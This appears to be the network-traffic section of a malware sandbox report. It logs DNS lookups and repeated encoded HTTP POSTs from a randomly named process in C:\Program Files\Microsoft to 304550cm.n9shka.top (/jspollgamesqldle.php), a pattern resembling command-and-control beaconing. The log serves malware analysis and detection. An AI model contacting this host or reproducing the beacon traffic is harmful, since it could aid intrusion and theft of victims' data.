                                                          Sep 8, 2024 11:55:59.384645939 CEST6497180192.168.2.480.211.144.156

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 8, 2024 11:52:07.435322046 CEST5440553192.168.2.41.1.1.1
                                                          Sep 8, 2024 11:52:08.123707056 CEST53544051.1.1.1192.168.2.4
                                                          Sep 8, 2024 11:52:26.422591925 CEST5351966162.159.36.2192.168.2.4
                                                          Sep 8, 2024 11:52:26.944845915 CEST53494351.1.1.1192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Sep 8, 2024 11:52:07.435322046 CEST192.168.2.41.1.1.10x654fStandard query (0)304550cm.n9shka.topA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Sep 8, 2024 11:52:08.123707056 CEST1.1.1.1192.168.2.40x654fNo error (0)304550cm.n9shka.top80.211.144.156A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • 304550cm.n9shka.top

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.44973880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:08.136590004 CEST318OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:08.505341053 CEST344OUTData Raw: 00 0b 04 00 06 0a 01 02 05 06 02 01 02 06 01 0a 00 00 05 0a 02 04 03 0c 07 0e 0c 05 05 01 06 03 0d 0f 05 59 07 0c 07 02 0b 01 05 50 04 03 07 0f 06 06 0f 0e 0f 05 04 06 06 0e 07 0d 07 04 06 0d 00 06 0d 0f 05 51 07 09 0d 01 0c 03 0f 03 0e 09 06 06
                                                          Data Ascii: YPQTP\L}S~`X`\[u[ShoeBwBhl{sHzszkCl`k[iO~V@BzmzO}ra
                                                          Sep 8, 2024 11:52:08.799870014 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:08.949632883 CEST1236INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:08 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 1320
                                                          Connection: keep-alive
                                                          Data Raw: 56 4a 7e 4c 7b 7d 7b 03 6f 62 7c 00 7c 61 67 06 7c 77 7f 40 68 06 79 0a 6e 73 6c 4d 7f 72 74 03 77 60 7d 09 7b 61 5c 5f 62 75 6b 5b 7d 61 78 01 55 4b 72 50 77 71 64 5e 68 72 5b 01 68 67 5b 53 78 58 63 52 6a 5d 7f 4a 76 4c 69 4c 74 4f 53 01 7e 72 66 05 7f 7c 74 43 6a 74 77 07 75 5c 7b 06 7c 5c 5b 00 7d 06 61 07 7b 74 7f 5f 78 49 5e 4d 7b 7e 60 5d 78 72 7f 5b 6f 73 6e 4e 7c 63 63 5b 78 67 70 4a 7d 5b 73 04 61 4f 7f 5d 7a 51 41 5b 7c 59 77 51 6b 61 7d 09 61 52 63 5f 7b 42 56 00 76 73 6e 0c 6e 58 7d 49 7e 0a 6a 03 6c 4f 71 5b 62 73 51 44 75 5f 56 06 74 62 6e 50 7e 5d 7a 06 77 62 6d 00 61 66 7c 09 68 42 65 05 77 6f 60 04 7f 5a 7c 03 78 6c 63 03 7a 73 76 02 7c 6d 6f 51 77 67 6f 5f 69 61 7e 09 7e 6e 70 54 78 0b 6e 06 7d 04 7d 07 7b 5d 46 51 7f 7f 6c 0b 6a 5e 70 4f 6a 67 5c 4e 78 6e 74 5e 6c 5c 52 05 68 62 7f 4a 7d 74 73 40 6b 5e 71 08 6d 5d 7c 00 69 61 60 05 60 4d 69 51 7b 5c 79 02 76 66 56 48 7d 76 78 05 7e 58 53 08 74 62 67 49 7c 5c 79 4c 7f 77 6a 0a 7b 66 60 0d 7e 73 55 4a 75 72 5f 4e 77 71 6d 49 7e 61 [TRUNCATED]
                                                          Data Ascii: VJ~L{}{ob||ag|w@hynslMrtw`}{a\_buk[}axUKrPwqd^hr[hg[SxXcRj]JvLiLtOS~rf|tCjtwu\{|\[}a{t_xI^M{~`]xr[osnN|cc[xgpJ}[saO]zQA[|YwQka}aRc_{BVvsnnX}I~jlOq[bsQDu_VtbnP~]zwbmaf|hBewo`Z|xlczsv|moQwgo_ia~~npTxn}}{]FQlj^pOjg\Nxnt^l\RhbJ}ts@k^qm]|ia``MiQ{\yvfVH}vx~XStbgI|\yLwj{f`~sUJur_NwqmI~aP~|RN}IYva{\m~p}xYpN{IhxC{yL`x]~L`RK{w^~LUwa`}|UId}qe@w|Zx|`It^f@y_q}lvOxOjusUuORwOTCpXOvbyv[tOlaOvlp|]t{BUJ{^Xm^AvwR~LzA~SU{}v}\SO}`Z@BpN}N`}wnz}wJxL`I|_s|goO|NWys|L~L|w]q@zaSvHh}X|@}vaOw\QKLSgXxvh|sUv\}wqSH|arF~|^N}Ywa{JzriI|pSywxCxwty}gFyr`Ixs\{]NZlwpjLoaO|jlgkd`azSvUs^{Rtt^}SyqyGiUv_z\yvxBagx[L~JxY}]`LSBuvQB\^tBZ|Z`ocJ{^fJ|pcg]Z}beRzSYQW~CjrAPsIPQULiINjqGd`F_FX|_sK|wUOk^uOyphB~qpwMvQ{qqufpjX|fPRvqgZ}XC\heOUuAi^E`rZZmn\RbXQ||Yct_wIxOJ~Mq@^]XT{FRnVAUZ[Toe{^VZb^czpZA[XFWbZW`xK{XPUZ{EQoUA[X@nbP@Q_z\y~boUTobOXL~JxYW[[zF\f]HSTLco]ESwTd^|^\Z{PNPco@SqOiZMm}Zj\A [TRUNCATED]
                                                          Sep 8, 2024 11:52:08.949985027 CEST241INData Raw: 45 51 71 48 04 68 01 5f 4c 6e 00 77 4e 57 60 07 00 5b 58 54 79 60 62 09 5c 78 5f 5c 58 66 6f 00 49 54 74 64 58 71 73 7c 00 6c 6e 6a 5c 50 4d 7a 45 6c 5a 7b 76 54 64 6f 4c 57 6e 7c 59 7e 5f 42 58 6f 05 61 40 51 73 41 02 6c 01 59 46 6b 04 78 41 5a
                                                          Data Ascii: EQqHh_LnwNW`[XTy`b\x_\XfoITtdXqs|lnj\PMzElZ{vTdoLWn|Y~_BXoa@QsAlYFkxAZ[g@QU`GVvNhraPwQp_y{{_ccNV}b^RoPlD\pZFbbmXqMkgzp_qFq\]TSrF]o]ES[@o`dBQ|eXhjppZpEy[STQtKQnSFRZDPVS`kjsdQ|Z~]yzx]laFS}d]Rd^Us\LnoICR[`Xv^yQRm
                                                          Sep 8, 2024 11:52:09.058798075 CEST294OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 380
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:09.262919903 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:09.263114929 CEST380OUTData Raw: 5b 58 59 51 5f 58 5e 5c 5c 5a 51 56 57 5b 57 52 50 5e 5e 5f 54 5e 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [XYQ_X^\\ZQVW[WRP^^_T^SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%;1)\?)Y# X>Z/^0)[8$,0)?[!-)Y++Z3$8[-;#G X/
                                                          Sep 8, 2024 11:52:09.559273005 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:08 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 25 0d 27 11 21 59 20 3d 3b 53 3e 2c 21 1c 2e 2d 0e 58 28 39 22 1d 28 33 23 0f 2a 11 26 12 29 3b 08 1b 3e 05 38 5b 37 0f 3c 03 26 35 28 5e 03 11 23 12 36 00 08 10 2b 29 0b 00 3d 08 2f 05 29 3f 09 10 21 34 30 53 37 15 3b 00 23 06 03 0e 3f 39 26 1d 2c 27 3e 1b 2d 33 3a 51 21 24 2d 57 0c 12 23 0a 29 3e 3c 09 34 30 25 58 32 10 29 1f 25 26 36 1d 3d 2b 25 0d 28 5e 3a 5b 32 32 3c 0f 24 2d 31 58 2a 16 2e 1a 24 00 3f 5c 21 07 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: %'!Y =;S>,!.-X(9"(3#*&);>8[7<&5(^#6+)=/)?!40S7;#?9&,'>-3:Q!$-W#)><40%X2)%&6=+%(^:[22<$-1X*.$?\!$S-"T=\V
                                                          Sep 8, 2024 11:52:09.581399918 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:09.785677910 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:09.785870075 CEST1412OUTData Raw: 5b 59 5c 53 5f 5e 5b 5c 5c 5a 51 56 57 53 57 54 50 59 5e 51 54 54 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Y\S_^[\\ZQVWSWTPY^QTTSFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/":> 4 X*+_$/;(')5=<%0$$$]-;#G X/
                                                          Sep 8, 2024 11:52:10.092758894 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:09 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 25 0b 30 01 3d 5b 21 00 27 1f 2a 11 31 54 3a 3d 38 13 3d 29 3a 1b 3d 23 30 1e 3d 06 32 13 3e 05 07 08 2a 3c 01 01 37 21 30 01 32 25 28 5e 03 11 23 11 22 3e 00 5a 3d 17 32 1d 3e 1f 33 01 28 3f 27 5c 22 37 34 1d 37 05 23 02 34 5e 39 0a 3c 39 29 09 2c 0a 00 19 2e 33 32 50 21 1e 2d 57 0c 12 20 15 28 58 3f 57 20 23 25 59 26 10 3d 11 24 18 00 5e 29 5e 3a 13 28 06 26 59 31 32 34 08 27 04 2d 10 2b 28 2a 5c 27 29 33 12 21 2d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: %0=[!'*1T:=8=):=#0=2>*<7!02%(^#">Z=2>3(?'\"747#4^9<9),.32P!-W (X?W #%Y&=$^)^:(&Y124'-+(*\')3!-$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.44973980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:09.173141956 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:09.525137901 CEST2532OUTData Raw: 5e 5b 5c 56 5a 52 5b 5b 5c 5a 51 56 57 5e 57 50 50 5c 5e 5b 54 5c 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^[\VZR[[\ZQVW^WPP\^[T\SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%;)]=*4 =#\39\8';'9#"=_<&'3Z9#G X/5
                                                          Sep 8, 2024 11:52:09.851191998 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:09.981803894 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:09 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.44974180.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:10.117616892 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:10.462630987 CEST2532OUTData Raw: 5e 5b 5c 55 5f 5d 5b 5b 5c 5a 51 56 57 5e 57 54 50 5e 5e 5d 54 5a 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^[\U_][[\ZQVW^WTP^^]TZSHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&."=^>*$# ;)0!Z/$?U':4!."<5'_3$^.+#G X/5
                                                          Sep 8, 2024 11:52:10.782573938 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:11.176301956 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:10 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.44974280.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:11.310686111 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:11.665771961 CEST2532OUTData Raw: 5e 5d 59 54 5f 5e 5e 5c 5c 5a 51 56 57 58 57 56 50 5e 5e 5e 54 54 53 47 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]YT_^^\\ZQVWXWVP^^^TTSGTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%_/2%>7_70[)/7]$",7+3_+!><Y':;#G X/-
                                                          Sep 8, 2024 11:52:11.984271049 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:12.181865931 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.44974480.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:12.308795929 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:12.665771008 CEST2532OUTData Raw: 5b 51 5c 57 5a 5c 5b 5f 5c 5a 51 56 57 53 57 51 50 5a 5e 59 54 5b 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Q\WZ\[_\ZQVWSWQPZ^YT[SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\,=[>_(7)(0//?S397Z!=5_)&,077-;#G X/
                                                          Sep 8, 2024 11:52:12.973934889 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:13.104924917 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:12 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.44974680.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:13.237826109 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:13.587671041 CEST2532OUTData Raw: 5b 5c 59 55 5a 5a 5b 5a 5c 5a 51 56 57 53 57 54 50 51 5e 5c 54 5c 53 45 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [\YUZZ[Z\ZQVWSWTPQ^\T\SETRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/W9]>9$7V3=,0<9,4?'_(6=+@ $74Z9#G X/
                                                          Sep 8, 2024 11:52:13.903029919 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:14.032896996 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:13 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.44974780.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:14.156831026 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:14.510838032 CEST2532OUTData Raw: 5b 5b 59 51 5a 5c 5e 5a 5c 5a 51 56 57 5a 57 5d 50 5f 5e 51 54 58 53 42 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [[YQZ\^Z\ZQVWZW]P_^QTXSBTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%_/==:'X#0Z)?7$9_87#S$*#Y#..(6'[04 _9;#G X/%
                                                          Sep 8, 2024 11:52:14.823719978 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:15.028212070 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:14 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.44974880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:15.109888077 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1400
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.44974980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:15.431118011 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:15.775325060 CEST2528OUTData Raw: 5b 59 59 51 5a 5b 5e 5f 5c 5a 51 56 57 5b 57 57 50 5e 5e 5e 54 59 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [YYQZ[^_\ZQVW[WWP^^^TYSFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&81*); V0X*<+\$/Z/$0*'".*)&?^$$ 9;#G X/)
                                                          Sep 8, 2024 11:52:16.123929977 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:16.259923935 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:15 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.44975080.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:16.388066053 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:16.743978024 CEST2532OUTData Raw: 5b 59 59 51 5a 5d 5b 5b 5c 5a 51 56 57 5a 57 50 50 5f 5e 50 54 5d 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [YYQZ][[\ZQVWZWPP_^PT]S@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%,2>:;408X*(3?,7<'X"=5+,'7[-;#G X/%
                                                          Sep 8, 2024 11:52:17.058253050 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:17.189481974 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:16 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.44975180.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
